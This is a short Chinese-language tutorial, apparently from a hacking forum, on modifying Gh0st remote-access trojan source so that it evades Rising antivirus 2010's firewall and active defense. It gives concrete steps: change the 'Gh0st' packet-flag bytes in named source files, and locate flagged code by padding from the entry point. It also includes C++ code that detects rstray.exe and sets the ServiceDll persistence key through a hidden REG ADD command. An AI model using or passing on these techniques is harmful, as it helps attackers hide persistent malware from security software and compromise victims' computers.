源码免杀实战之Gh0st过瑞星2010主动和防火墙

1.瑞星防火墙：

 过瑞星防火墙的方法很简单，只要修改两个地方就可以了。

gh0st\include\IOCPServer.cpp
Server\svchost\ClientSocket.cpp

 BYTE bPacketFlag[] = {'G', 'h', '0', 's', 't'};

修改成任何字符即可，但要注意的是，这样修改后，就不能和以前的gh0st相兼容了，修改后的服务端

用以前的控制端将不能上线。

 

2.瑞星2010主动防御：

 对于主动防御，最重要的是得知道怎么去定位主动防御到底查杀了哪段代码。这就需要我们耐

心的从代码入口开始去填充，直到填充到主动防御查杀的代码为止。

 

  if(ProcessExit("rstray.exe"))
  {
   char szCommand[1024];
   wsprintf(szCommand, "REG ADD HKEY_LOCAL_MACHINE\\%s /v ServiceDll /t REG_EXPAND_SZ /d \"%s\"", strSubKey, strModulePath);
   WinExec(szCommand, SW_HIDE);
  }
  else
  {
   WriteRegEx(HKEY_LOCAL_MACHINE, strSubKey, "ServiceDll", REG_EXPAND_SZ, (char *)strModulePath, lstrlen(strModulePath), 0);
  }